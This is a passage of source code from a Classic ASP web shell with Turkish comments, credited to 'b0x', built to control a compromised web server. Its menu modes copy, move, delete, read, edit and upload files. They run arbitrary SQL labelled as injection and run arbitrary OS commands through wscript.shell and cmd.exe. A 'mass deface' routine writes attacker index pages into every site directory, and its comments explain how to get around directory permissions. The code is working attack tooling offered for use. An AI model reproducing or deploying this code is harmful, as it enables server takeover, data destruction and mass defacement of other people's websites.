  1764. response.write "</td></tr><td><tr><form action = "" "&FilePath&"?mode=23&Path="&Path&"&Time="&time&" "" method=""post""><table cellpadding=""0"" cellspacing=""0""><tr><td style=""background-color:121212"" class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b>Search: &nbsp;&nbsp;&nbsp;</b></td><td><input name=""hacked"" value=""mdb"" type=""text"" style=""width:200px;""></td><td><input type=""Submit"" value=""&nbsp;&nbsp;Go &raquo;&nbsp;&nbsp;"" style=""width:70; font-weight:bold;""></td></tr></table></td></form></tr><td><tr>"
  1765. response.write "<form action = "" "&FilePath&"?mode=1&Time="&time&" "" method=""post"">"
  1766. response.write "<table cellpadding=""0"" cellspacing=""0""><tr><td style=""background-color:121212"" class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b>Path : &nbsp;&nbsp;&nbsp;</b></td><td><input name=""remote"" value='"&Path&"' type=""text"" style=""width:350px;""></td><td><input type=""Submit"" value=""Move &raquo;"" style=""width:50; font-weight:bold;""></td></tr></table>"
  1767. response.write ""
  1768. response.write "</td></form></tr>"
  1769. response.write "</table></center>"
  1770.  
  1771. 'Yetki paneli Coded by b0x
  1772. response.write "<table width=""100%"">"
  1773. response.write "<tr valign=""top""><td colspan=""2"" align=""center"">"
  1774. response.write "<table cellpadding=""0"" cellspacing=""0"">"
  1775. response.write "<tr><td style=""background-color:121212"" class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b>Options :</b>&nbsp;&nbsp;&nbsp;</td>"
  1776. call yetki
  1777. response.write "</tr></table>"
  1778. response.write "<br></td></tr></table><br>"
  1779. end if
  1780.  
  1781.  
  1782.  
  1783. SELECT CASE mode
  1784. CASE 2 ' Dizin Copy TA?I Coded by b0x
  1785. on error resume next
  1786. response.write "<table width=""100%"">"
  1787. response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
  1788. response.write "<form name=""dizincopypaste"" action='"&FilePath&"' type=""post"">"
  1789. response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
  1790. tablo30(" <b>Dizin Copy / Ta?? Merkezi</b>")
  1791. tablo30("&nbsp;")
  1792. response.write "<input type=""hidden"" value=""3"" name=""mode""><input type=""hidden"" value="&file&" name=""file2""><input type=""hidden"" value="&FolderPath&" name=""Path""><input type=""hidden"" value="&time&" name=""Time""> "
  1793. tablo12("Kop. Yer : <input style='color=#C6FCBE' size=""60"" type=""text"" name=""FolderPath2"" value="&FolderPath&">")
  1794. tablo12("<input type=radio name='islem' value='kopyala' checked>Copy <input type=radio name='islem' value='tasi'>Move File")
  1795. tablo12("<br><input value="" G?nder "" type=""Submit"">")
  1796. response.write "</form></table></td></tr></table><br>"
  1797. Call Status
  1798.  
  1799. CASE 3 ' dizin kop ta??mam ger?ekle?iyor by b0x
  1800. on error resume next
  1801. if islem="kopyala" then
  1802. b0x.CopyFolder Path,FolderPath2
  1803. isl="kopyaland?.."
  1804. elseif islem="tasi" then
  1805. b0x.MoveFolder Path,FolderPath2
  1806. isl="ta??nd?.."
  1807. end if
  1808. response.Write "<br><br><center>Klasor "&isl&" <br>"
  1809. response.Write "<br><font color=yellow>Kaynak : </font>"&FolderPath&"<br><font color=yellow>Hedef : </font>"&FolderPath2
  1810. response.Write "<br><br>by b0x</center>"
  1811. Call Status
  1812.  
  1813. CASE 4 ' Dizin S?lmee by b0x
  1814. on error resume next
  1815. b0x.DeleteFolder del
  1816. if err<>0 then
  1817. Call olmadi("Dizin Silenemdi")
  1818. else
  1819. Call oldu("Dizin Silindi")
  1820. end if
  1821.  
  1822. CASE 5 ' Dosya Deleting olay? ger?ekli?iypor by b0x
  1823. on error resume next
  1824. b0x.DeleteFile del
  1825. if err<>0 then
  1826. Call olmadi("Dosya Silinemedi")
  1827. else
  1828. Call oldu("Dosya Silindi")
  1829. end if
  1830.  
  1831. 'CASE 6 ' Dosya Dowlaod etme by b0x
  1832. ' Download Status l? oldu?u i?in, USTTE ta??d?mm
  1833.  
  1834. CASE 7 ' Dosya Kopayla Ta??ma POST k?sm? by b0x
  1835. on error resume next
  1836. response.write "<table width=""100%"">"
  1837. response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
  1838. response.write "<form name=""dosyacopypaste"" action='"&FilePath&"' type=""post"">"
  1839. response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
  1840. tablo30(" <b>Copy File</b>")
  1841. tablo30("&nbsp;")
  1842. response.write "<input type=""hidden"" value=""8"" name=""mode""><input type=""hidden"" value="&time&" name=""Time""><input type=""hidden"" value="&file&" name=""file""> "
  1843. tablo12("Kop. Yer : <input size=""60"" type=""text"" name=""folder"" value="&file&">")
  1844. tablo12("<input type=radio name='islem' value='kopyala' checked>Copy <input type=radio name='islem' value='tasi'>Move ")
  1845. tablo12("<br><input value="" G?nder "" type=""Submit"">")
  1846. response.write "</form></table></td></tr></table><br>"
  1847. Call Status
  1848.  
  1849. CASE 8 ' Dosya kopyala, ta??maa olay? by b0x
  1850. on error resume next
  1851. if islem="kopyala" then
  1852. b0x.CopyFile file,folder&""
  1853. isl="kopyaland?.."
  1854. elseif islem="tasi" then
  1855. b0x.MoveFile file,folder&""
  1856. isl="ta??nd?.."
  1857. end if
  1858. if err <> 0 then
  1859. response.Write "<br><br><center>Ba?ar?s?zl?kla sonu?land? !!! <br>"
  1860. else
  1861. response.Write "<br><br><center>Klasor "&isl&" <br>"
  1862. end if
  1863. response.Write "<br><font color=yellow>Kaynak : </font>"&file&"<br><font color=yellow>Hedef : </font>"&folder&"\"
  1864. response.Write "<br><br>by b0x</center>"
  1865. Call Status
  1866.  
  1867. CASE 9 ' Dosya ??ini Go by b0x
  1868. on error resume next
  1869. Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
  1870. Response.Write "<table class=""kbrtm"" width=100% ><tr><td>"
  1871. set f = b0x.OpenTextFile(file,1)
  1872. Response.Write "<font size=3><pre>"&Server.HTMLEncode(f.readAll)&"</pre></font>"
  1873. Response.Write "</td></tr></table>"
  1874. nolist = True
  1875. if err<>62 then Status
  1876. if err.number=62 then
  1877. Response.Write "<script language=javascript>alert('Bu Dosya Okunam?yor\nSistem dosyas? olabilir')</script>"
  1878. nolist = False
  1879. end if
  1880.  
  1881. CASE 10 ' ASP txt php .. gibi dosyalar? Editlemek i?in POSt k?sm? by b0x
  1882. on error resume next
  1883. set f = b0x.OpenTextFile(file,1)
  1884. response.Write "<center><form action='"&FilePath&"?Time="&time&"&Path="&FolderPath&"' method=""post""><table class=""kbrtm""><tr><td align=""center"">"
  1885. Response.Write "<input type=hidden name=""mode"" value='11'>"
  1886. Response.Write "<input type=hidden name=file value="&file&">"
  1887. Response.Write "<br><br><input type=submit value="" .. :: Save :: .. ""><br><br></td></tr><tr><td align=""center"">"
  1888. Response.Write "<textarea name=""islem"" style='width:90%;height:350;'>"
  1889. Response.Write server.HTMLEncode(f.readAll)
  1890. Response.Write "</textarea></td></tr></table></form></center>"
  1891. Call Status
  1892. nolist = True
  1893.  
  1894. CASE 11 ' Editleme olay?? ger?ekle?iyor by b0x
  1895. on error resume next
  1896. set saveTextFile = b0x.OpenTextFile(file,2,true,false)
  1897. Call Status
  1898. saveTextFile.Write(islem)
  1899. saveTextFile.close
  1900. if err<>0 then
  1901. olmadi("Editlenemedii")
  1902. else
  1903. oldu("Editlendi")
  1904. end if
  1905.  
  1906. CASE 12 ' Resim Dosyas?n? Goe by b0x
  1907. on error resume next
  1908. Response.Write "<br><center><img ALT=""CyberWarrior // b0x"" src='"&file&"'></center><br><br>"
  1909. Call Status
  1910. nolist = True
  1911.  
  1912. CASE 13 ' SQL i?in TAblolar? Listeleme by b0x
  1913. Response.Write "<center><b><font size=3>Tablolar</font></br><br>"
  1914. Set objConn = Server.CreateObject("ADODB.Connection")
  1915. Set objADOX = Server.CreateObject("ADOX.Catalog")
  1916. objConn.Provider = "Microsoft.Jet.Oledb.4.0"
  1917. objConn.ConnectionString = file
  1918. objConn.Open
  1919. objADOX.ActiveConnection = objConn
  1920.  
  1921. response.write "<table class=""kbrtm"">"
  1922. For Each table in objADOX.Tables
  1923. If table.Type = "TABLE" Then
  1924. Response.Write "<tr><td><font face=wingdings size=5>4</font> <a href='"&FilePath&"?mode=14&file="&file&"&table="&table.Name&"&Path="&FolderPath&"&time="&time&"'>"&table.Name&"</a></td></tr>"
  1925. End If
  1926. Next
  1927. response.write "</table>"
  1928. response.write "</center>"
  1929. Call Status
  1930. nolist = True
  1931.  
  1932. CASE 14 ' TAblo i?eri?i Gome by b0x
  1933. Call SQL_menu_by_b0x
  1934. Call SQL_by_b0x(file,table)
  1935. nolist = True
  1936.  
  1937. CASE 15 ' SQL kod yerle?tirme olay? by b0x
  1938. if islem = "select" then inject = inject1
  1939. if islem = "delete" then inject = inject2
  1940. if islem = "insert" then inject = inject3
  1941. if islem = "update" then inject = inject4
  1942. if islem = "diger" then inject = inject5
  1943. SQL_menu_by_b0x
  1944. response.write "<br><center>Db Yeri : <font color=#C6FCBE>"&file&"</font></center>"
  1945. response.write "<br><center>Sql komut : <font color=#C6FCBE>"&inject&"</font></center><br>"
  1946. if islem = "select" then
  1947. if not b0xsql = "" then
  1948. Call MSSQL_by_b0x(b0xsql,inject)
  1949. else
  1950. Call SQL_by_b0x(file,inject)
  1951. end if
  1952. else
  1953. on error resume next
  1954. if b0xsql = "" then
  1955. Set objConn = Server.CreateObject("ADODB.Connection")
  1956. Set objRcs = Server.CreateObject("ADODB.RecordSet")
  1957. objConn.Provider = "Microsoft.Jet.Oledb.4.0"
  1958. objConn.ConnectionString = file
  1959. objConn.Open
  1960. else
  1961. Set objConn = Server.CreateObject("ADODB.Connection")
  1962. Set objRcs = Server.CreateObject("ADODB.RecordSet")
  1963. objConn.Open b0xsql
  1964. end if
  1965.  
  1966. if err <> 0 then
  1967. response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Ba?lant?n?z Sa?lanaMAd?? !!! by b0x :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"
  1968. else
  1969. on error resume next
  1970. objRcs.Open inject,objConn, adOpenKeyset , , adCmdText
  1971. if err <> 0 then
  1972. Call olmadi("<br>SQL ?njection Komutunuzda Status var. Bilmiyorsan Kullanma<br><br>")
  1973. else
  1974. Call oldu("<br> SQL ?njection Ba?ar?yla GEr?ekle?tii.<br><br>")
  1975. end if
  1976. end if
  1977. objRcs.close
  1978. objConn.close
  1979. end if
  1980. nolist = True
  1981.  
  1982. CASE 16 ' Dosya ADI de?i?tirme Formu by b0x
  1983. on error resume next
  1984. response.write "<table width=""100%"">"
  1985. response.write "<tr valign=""top""><td colspan=""2"" align=""center"">"
  1986. response.write "<form name=""dosyanameedit"" action='"&FilePath&"' type=""post"">"
  1987. response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"" class=""kbrtm"" >"
  1988. tablo30(" <b>Dosya AD? de?i?tirme MErkezi</b>")
  1989. tablo30("Ad? : <font color=#C6FCBE>"&islem&"</font> <br> Yeri : <font color=#C6FCBE>"&file&"</font>")
  1990. response.write "<input type=""hidden"" value=""17"" name=""mode""><input type=""hidden"" value="&file&" name=""file""><input type=""hidden"" value="&FolderPath&" name=""Path""><input type=""hidden"" value="&time&" name=""Time""> "
  1991. tablo12("<b>Dosyan?n Yeni Ad?: </b> &nbsp;<input size=""30"" type=""text"" name=""islem"" value="&islem&">")
  1992. tablo12("<br><input value="" G?nder "" type=""Submit"">")
  1993. response.write "</form></table></td></tr></table><br>"
  1994. Call Status
  1995.  
  1996. CASE 17 ' Dosya Ad? de?i?tirme Olay? ger?ekle?iyor by b0x
  1997. on error resume next
  1998. Set fileObject = b0x.GetFile(file)
  1999. fileObject.Name = islem
  2000. if err <> 0 then
  2001. Call olmadi("<br>DOsya Ad? de?i?eMEdii<br><br>")
  2002. else
  2003. Call oldu("<br>Dosya Ad? de?i?ti<br><br>")
  2004. end if
  2005. Set fileObject = Nothing
  2006. Call Status
  2007.  
  2008. CASE 18 ' MAss Defeced Merkezi by b0x
  2009. on error resume next
  2010. response.write "<table width=""100%"" class=""kbrtm""><tr valign=""top""><td colspan=""2"" align=""center"">"
  2011. response.write "<form name=""massattack"" action='"&FilePath&"' type=""post"">"
  2012. response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"" class=""kbrtm"">"
  2013. tablo30(" <b>MASS Defaced Merkezi</b>")
  2014. tablo30("...... ::::: ?ndex KOD unu A?a??ya Yaz / Yap??t?r ::::: ......")
  2015. tablo30("<br><b>Path : </b><input style=""color=#C6FCBE"" size=""60"" name=""Path"" value='"&Path&"' type=""text""><br><br>")
  2016. response.write "<input type=""hidden"" value=""19"" name=""mode""><input type=""hidden"" value="&time&" name=""Time""> "
  2017. tablo12O("<textarea style=""width:500px; height:250px"" name=""file""></textarea>")
  2018. tablo12O(" <input type=""radio"" value=""brute"" name=""islem"" checked> Brute - <input value=""single"" type=""radio"" name=""islem"" > Single - <input value=""ozel"" type=""radio"" name=""islem"" > Private <input name=""inject1"" value=""z.html"" type=""text"" size=15> &nbsp;&nbsp; <input value=""ok"" type=checkbox name=""hash3"" >Eklenti <input size=15 name=""hash2"" value=""httpdocs\"" type=""text"">")
  2019. tablo12O("<input name=""hash9"" value=""copy"" type=radio checked> Kopyalayarak - <input name=""hash9"" value=""yarat"" type=radio> Olu?turarak")
  2020. tablo12O("<input value="" Havayaa U?urr "" type=""Submit"">")
  2021. yazsol("<font color=#C6FCBE><b>Brute : </b>Belirtilen Dizinin ALt?ndaki; T?m Dizinlere ve onlar?nda ALt Dizinleri ?ndex BAsar. </font>")
  2022. yazsol("<font color=#C6FCBE><b>Single : </b>Belirtilen Dizinin ALt?ndaki; Alt Dizinlere ?ndex BAsar. </font>")
  2023. yazsol("<font color=#C6FCBE><b>Private : </b>Belirtilen Dizinin ALt?ndaki; Alt Dizinlere ?stedi?iniz ?simle ?ndex BAsar. </font> ")
  2024. yazsol("<font color=#C6FCBE><b>Eklenti : </b>BRUTE & Single ile kullan?l?r. Permsion var ise bunu se?menize ayarlaman?za gerek yok. E?er site isimlerini listeleytebiliyor, ve i?ine girremiyor fakat klas?r atlayarak girebiliyorsan?z. o zaman bunu se?in ve bulunan klas?rrden sonrakine gidip oraya index leri atar. Mesela ; '..site\b03545x_com', '..\site\hab656er_com' .. gibi siteelr listeli. bunlar?n i?lerine girid?inizde g?r?nt?lkeme yetkinzi yok . Ama e?er '..\site\b0gfgdx_com\www\' yap?nca girebiliyorsna?z. PERM?S?ON a?ma y?ntemidir. b?ylece Eklenti yerine 'www' yazarak ve se?erekden. t?m sitelere o kla?sr i?ine girme yetkisini sa?lay?p, index b?rakt?r?rr?z. </font> ")
  2025. yazsol("<font color=#C6FCBE><b>Kopyalayarak : </b>b0x dizinine bir TXT yazar. Sonra onu TUm klas?rlere KOpyalayarak i?lem yapar. E?er b0x dizininde Writing yok ise, i?lem ger?ekle?mez. TUM MASS lar b?yledir. </font> ")
  2026. yazsol("<font color=#C6FCBE><b>Yaratarak : </b>Direk index kodunuzu, Klas?lerde OLU?TURARAk MASS yapar. BU b0x & b0xPOR4TAL.CoM FARk? ile. 1-2 defa ba??ma geldi=) o y?zden bu ?zellei?i ekledim.</font> ")
  2027. yazsol("<font color=#FE7A84><b>NOT : </b>Brute & Single da 9 ?e?it index basar, Private da ?stdi?iniz ?simle 1 tane atar ;) </font>")
  2028. response.write "</table></td></form></tr></table><br>"
  2029. Call Status
  2030.  
  2031. CASE 19 'Mass Deface ??leniyor. E?er ?ndex yok ise, Status ve FOrm sunuyor, aksi halde MASS yap?yor.
  2032. file = file&"<center><br><br><font color=green><b></b></font><br></center>"
  2033. if hash9 = "copy" then
  2034. on error resume next
  2035. a=Left(replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"),InStrRev(replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"),"\"))
  2036. Set hackindex = b0x.CreateTextFile(a&"\b0x.txt", True)
  2037. hackindex.write file
  2038. if err <> 0 then
  2039. response.write "<center><br><font color=#FE7A84> <font face=Wingdings size=5>N</font> Bulundu?un Dizinde Writing YEtin yok. Bu y?zden ?ndex Sayfas? olu?turulamad?. <font face=Wingdings size=5>N</font> <br><br> <font face=Wingdings size=5>N</font> E?er ki Server i?ine bir Tane index y?kler ve a?a??daki yere tam link ini yazarsan, O zaman MASS Defaced ba?l?yacakt?r. <font face=Wingdings size=5>N</font> <br><br><br></center>"
  2040. response.write "<table width=""100%"">"
  2041. response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
  2042. response.write "<form name=""dizincopypaste"" action='"&FilePath&"' type=""post"">"
  2043. response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
  2044. response.write "<input type=""hidden"" name='islem' value='"&islem&"'><input type=""hidden"" name='inject1' value='"&inject1&"'><input type=""hidden"" name='file' value='"&file&"'><input type=""hidden"" name='Time' value='"&time&"'><input type=""hidden"" name='mode' value='20'><input type=""hidden"" name='Path' value='"&Path&"'>"
  2045. Call tablo30("<b>?ndex in Server daki kendi ?ndex inin YErini G?ster. </b>")
  2046. Call tablo30("&nbsp;")
  2047. Call tablo12("<input size=""80"" type=""text"" name=""hacked"" style='color=#C6FCBE' value='"&FolderPath&"&/index.html'>")
  2048. Call tablo12("<br><input value="" OK tamamd?r. ?ndex imi se?tim. "" type=""Submit"">")
  2049. response.write "</form></table></td></tr></table><br>"
  2050. else
  2051. set hacking = nothing
  2052. hacked = a&"\b0x.txt"
  2053. hash6 = Path
  2054. Call MassAttack2(Path,file,hash2)
  2055. Call MassAttack(hash6,file,hash2)
  2056. response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... :::: Bitttiiii :::: ..... </b></td></tr></table> "
  2057. response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>Developed By TurkisH-RuleZ</b><br><br> </td></tr></table> "
  2058. Response.Write "<script language=javascript>alert('Mass Defaced Completed Successfully !!... ')</script>"
  2059. end if
  2060. else if hash9 = "yarat" then
  2061. hash6 = Path
  2062. Call MassAttack2(Path,file,hash2)
  2063. Call MassAttack(hash6,file,hash2)
  2064. response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... :::: Bitttiiii :::: ..... </b></td></tr></table> "
  2065. response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>Developed By TurkisH-RuleZ</b><br><br> </td></tr></table> "
  2066. Response.Write "<script language=javascript>alert('Mass Defaced Completed Successfully !!...1 ')</script>"
  2067. end if
  2068. end if
  2069. Call Status
  2070.  
  2071. CASE 20 ' Status sonucu, d?zeltme yap?ld? ise, burdan MAss dewaam ediyor.
  2072. on error resume next
  2073. Set cloner2 = b0x.GetFile(hacked)
  2074. if err <> 0 then
  2075. response.write "<br><br><br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> ?ndex Bulunamad?. Pathunu verid?in ?ndex yada Dosya BULUNAMADI. Mass Durdurudu !!! <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br><br><br>"
  2076. set cloner2 = nothing
  2077. else
  2078. set cloner2 = nothing
  2079. file="b0x"
  2080. hash6 = Path
  2081. Call MassAttack2(Path,file,hash2)
  2082. Call MassAttack(hash6,file,hash2)
  2083. response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... :::: Bitttiiii :::: ..... </b></td></tr></table> "
  2084. response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>Developed By TurkisH-RuleZ</b><br><br> </td></tr></table> "
  2085. Response.Write "<script language=javascript>alert('Mass Defaced Completed Successfully !!...2 ')</script>"
  2086. end if
  2087. Call Status
  2088.  
  2089. CASE 21 ' MASS tester formu by b0x
  2090. on error resume next
  2091. response.write "<table width=""100%"" class=""kbrtm"">"
  2092. response.write "<tr valign=""top""><td colspan=""2"" align=""center"">"
  2093. response.write "<form name=""masstester"" action='"&FilePath&"' type=""post"">"
  2094. response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"" class=""kbrtm"">"
  2095. tablo30(" <b>MASS Permision Tester</b>")
  2096. tablo30("...... ::::: ?zinleri Kontrol Eder ::::: ......")
  2097. tablo30("<br><b>Path : </b><input style=""color=#C6FCBE"" size=""60"" name=""Path"" value='"&Path&"' type=""text""><br><br>")
  2098. response.write "<input type=""hidden"" value=""22"" name=""mode""><input type=""hidden"" value="&time&" name=""Time""> "
  2099. tablo12O("<br><input value="" Teste Ba?laaaa... =) by b0x "" type=""Submit""><br><br>")
  2100. tablo12("&nbsp;")
  2101. response.write "<tr bgcolor=""#121212""><td class=""kbrtm"" align=""left"" width=""100%"" ><font color=#C6FCBE><b>NOT : </b>Bununla, Alt klas?rlerde Permision varm? yok mu ,Onu kontrol eder ve Listeler... </font> <font color=#C6FCBE face=Wingdings size=5>N</font></td></tr>"
  2102. response.write "</form></table></td></tr></table><br>"
  2103. Call Status
  2104.  
  2105. CASE 22 ' MASS TEster i?leme Gome by b0x
  2106. Call Tester(Path)
  2107. response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... :::: Bitttiiii :::: ..... </b></td></tr></table> "
  2108. response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>Developed By TurkisH-RuleZ</b><br><br> </td></tr></table> "
  2109. Response.Write "<script language=javascript>alert('Yetki Kontrolu Completed Successfully !!... ')</script>"
  2110. Call Status
  2111.  
  2112. CASE 23 ' arama bulma- en g?zel ?zeli?i time out olmamas? buldu?unu Writing s?d?r =) by b0x eseridir.
  2113. response.write "<br><center>"
  2114. i=0
  2115. Call arama(Path)
  2116. response.write "</center><br>"
  2117. Response.Write "<script language=javascript>alert('"&i&" Kay?t Bulundu .... ')</script>"
  2118. nolist = True
  2119. Call Status
  2120.  
  2121. CASE 24 ' Klas?r i?lermleri i?in Upload - Dosya ayarat - kla?sr yarat FORM lar? by b0x
  2122. on error resume next
  2123. response.write "<table bgcolor=#000000 width=""100%"" ><tr><td>"
  2124. response.write "<center><table width=""100%""><tr><td class=""kbrtm"" align=""center""> Upload Merkezi </td></tr><tr><td align=""center"" class=""kbrtm"">"
  2125. response.write "<form name=frmUpload method=post enctype=""multipart/form-data"" action='"&FilePath&"?mode=25&Time="&time&"&Path="&Path&"' ID=""Form1"">"
  2126. response.write "<input type=hidden name=folder value='"&Path&"' ID=""Hidden1"">"
  2127. response.write "Max: <input type=text name=max value=5 size=5 ID=""Text1""> <input type=button value=""Ayarla"" onclick=setid() ID=""Button1"" NAME=""Button1"">"
  2128. response.write "<table ID=""Table1"">"
  2129. response.write "<tr>"
  2130. response.write "<td id=upid>"
  2131. response.write "</td>"
  2132. response.write "</tr>"
  2133. response.write "</table>"
  2134. response.write "<input type=submit value="" ... :: Upload :: ... "" ID=""Submit1"" NAME=""Submit1"">"
  2135. response.write "</form>"
  2136. response.write "<script>"
  2137. response.write "setid();"
  2138. response.write "function setid() {"
  2139. response.write " str='';"
  2140. response.write " if (frmUpload.max.value<=0) frmUpload.max.value=1;"
  2141. response.write " for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input size=30 type=file name=file'+i+'><br>';"
  2142. response.write " upid.innerHTML=str+'<br>';"
  2143. response.write "}"
  2144. response.write "</script>"
  2145. response.write "</td></tr></table></center>"
  2146. response.write "<br><center><table align=""center"" width=""100%"" class=""kbrtm""><form name=""dosycrete"" action='"&FilePath&"?mode=26&Path="&Path&"&Time="&time&"' method=""post""><tr><td align=""center"">Klas?r Olu?tur : <input name=""file"" value=""b0x"" type=""text""> <input name=""git"" value="" Olu?tur "" type=""Submit""></td></tr></table></form></center>"
  2147. response.write "<center><table align=""center"" width=""100%"" class=""kbrtm""><form name=""filemaker"" action='"&FilePath&"?mode=27&Path="&Path&"&Time="&time&"' method=""post""><tr><td align=""center"">Dosya Ad? : <input name=""file"" value=""b0x.asp"" type=""text""></td></tr><tr align=""center""><td><textarea style='width:100%;height:100;' name=""islem""></textarea></td></tr> <tr align=""center""><td><input name=""git"" value=""..:: Olu?tur ::.."" type=""Submit""></td></tr></table></form></center>"
  2148. response.write "</td></tr></table>"
  2149. Call Status
  2150.  
  2151. CASE 25 ' Upload i?lemi by b0x
  2152. Upload()
  2153.  
  2154. CASE 26 ' Klas?r yarat by b0x
  2155. response.write "<br><br><br><br><table bgcolor=#000000 width=""100%"" ><tr><td class=""kbrtm"" align=""center"">"
  2156. if b0x.FolderExists(Path&"\"&file) = True then
  2157. response.write "<center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> B?yle Bir Klas?r ZATEN VAr !!!! <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center>"
  2158. else
  2159. on error resume next
  2160. b0x.CreateFolder(Path&"\"&file)
  2161. if err <> 0 then
  2162. olmadi("Klas?r Olu?turulamad?")
  2163. else
  2164. oldu("Klas?r Olu?turuldu")
  2165. end if
  2166. end if
  2167. response.write "</td></tr></table>"
  2168. Call Status
  2169.  
  2170. CASE 27 ' Dosya yarat by b0x
  2171. response.write "<br><br><br><br><table bgcolor=#000000 width=""100%"" ><tr><td class=""kbrtm"" align=""center"">"
  2172. on error resume next
  2173. Set MyFile = b0x.CreateTextFile(Path&"\"&file, True)
  2174. MyFile.write islem
  2175. if err <> 0 then
  2176. olmadi("Dosya Olu?turulamad?")
  2177. else
  2178. oldu("Dosya Olu?turuldu")
  2179. end if
  2180. response.write "</td></tr></table>"
  2181. MyFile.close()
  2182. Call Status
  2183.  
  2184. CASE 28 ' CMD Formu ve i?lem yeri by b0x
  2185. if cmdkod="" then cmdkod="ipconfig"
  2186. response.write "<center><table align=""center"" width=""100%"" class=""kbrtm""><tr><td>"
  2187. response.write "<form name=""commmanderbyb0x"" method=""Post"" action='"&FilePath&"?mode=28&Path="&Path&"'> <b>CMD Komut Listele : </b><input style='color=#DAFDD0' name=""cmdkod"" size='57' value='"&cmdkod&"' type='text'><input name='"&Path&"' value='"&Path&"' type='hidden'><input name='"&mode&"' value=""28"" type='hidden'><input name='"&file&"' value=""a"" type='hidden'><input value="".:Go:."" type='Submit'> "
  2188. response.write "</td></tr></form></table></center>"
  2189. response.write "<center><table align=""center"" width=""100%"" class=""kbrtm""><tr><td>"
  2190. response.write "<textarea style='color=#DAFDD0;width:100%;height:320;'>"
  2191. response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdkod).stdout.readall
  2192. response.write "</textarea>"
  2193. response.write "</td></tr></form><form name=""commmanderbyb0x2"" method=""Post"" action='"&FilePath&"?mode=28&Path="&Path&"'><tr><td><b>CMD Komut Cal??t?r: </b><input style='color=#DAFDD0' name=""inject4"" size='57' value='"&inject4&"' type='text'><input name='inject5' value='b0x' type='hidden'><input value="" .: Cal??t?r :. "" type='Submit'></td></tr>"
  2194. if inject5 = "b0x" then
  2195. on error resume next
  2196. tablo12("Komut Cal??t?r?ld?. ")
  2197. end if
  2198. response.write "</form></table></center>"
  2199. response.write "<br><center><table align=""center"" width=""100%"" class=""kbrtm"">"
  2200. tablo12L("<font color=#FE7A84><b>NOT : </b> CMD komutlar? tamamen , Server ?zerinde ?al??maktad?r. Siz burda yazaca??n?z komut orda ?al???p, size geri d?necektir.")
  2201. tablo12L("<font color=#FE7A84><b>NOT : </b> <b>CMD Komut Listele</b> olay?, >dir, >netstat, >ping gibi geri DOS da geri bilgi d?nd?ren komutlar kullan?l?r. AMA e?er program ?al???tmrka, traojan yada Notepad gibi fonksiyonal ve applicaitonl? programlar, komutlar?da <b>CMD komut Cal??t?r</b>dan Uygulaman?z gerekir.Aksi halde Sistem k?sa s?reli kitlenme ya?an?r. CEvap al?namayabilinir.GEre?inden fazla ?al???trm yaparsn?z , ??lemcide Sizin User?n?z?n <b>RAM + CPU </b>kulln?m? anormal artacakt?r. </font> <font color=#FE7A84 face=Wingdings size=5>N</font>")
  2202. yazorta("<a href='"&FilePath&"?mode=29&Path="&konu&"&Time="&time&"' onclick=""cmdhelp(this.href);return false;"">-->> Kullan?labilir CMD komutlar?ndan BAz?lar? <<-- </a>")
  2203. response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><b>by b0x</b></td></tr></td></tr></table></center>"
  2204.  
  2205.  
  2206. CASE 29 ' CMD a??klama k?sm? HELPER by b0x
  2207. response.write "<center>"
  2208. yazsol("<b>Attrib</b>: Attrib komutu dosyalara belli ?zellikleri verir veya kald?r?r. c:\>attrib +r +a +s +h yaz?p enter tu?una basarsak.(help i?in : <b> ' attrib /? ' </b>)")
  2209. yazsol("<b>Copy - xcopy</b> : Copy ve xcopy komutu ile istenilen dosya yada dosyalar?n ba?ka yerlere kopyalanmas? i?lemi ger?ekle?tirilir. Bilgi i?in bunu yaz?n :' <b>copy /? '</b>")
  2210. yazsol("<b>Net use</b> : Pc nin Payla??m, Hesaplar?, ayarlar?, kullan?c?lar?... gibi ?zellliklere ula?abilece?imiz ve de?i?tirebilece?imiz bir komut <b>NET</b> . Yar?m dosyas? i?in -> <b> net help </b> Writing n?z yeterlidir.")
  2211. yazsol("<b>Netstat</b> : PC deki a??k portlar?, ve diledi?iniz port u dinleyebilirsiniz. <b>Netstat -a -b -e -n -o -r -s -v</b> gibi parametreler al?r.")
  2212. yazsol("<b>Tracert</b> : Site, Ip, server ?n nerde oldu?unu tracert yapar. <b>tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name</b> ")
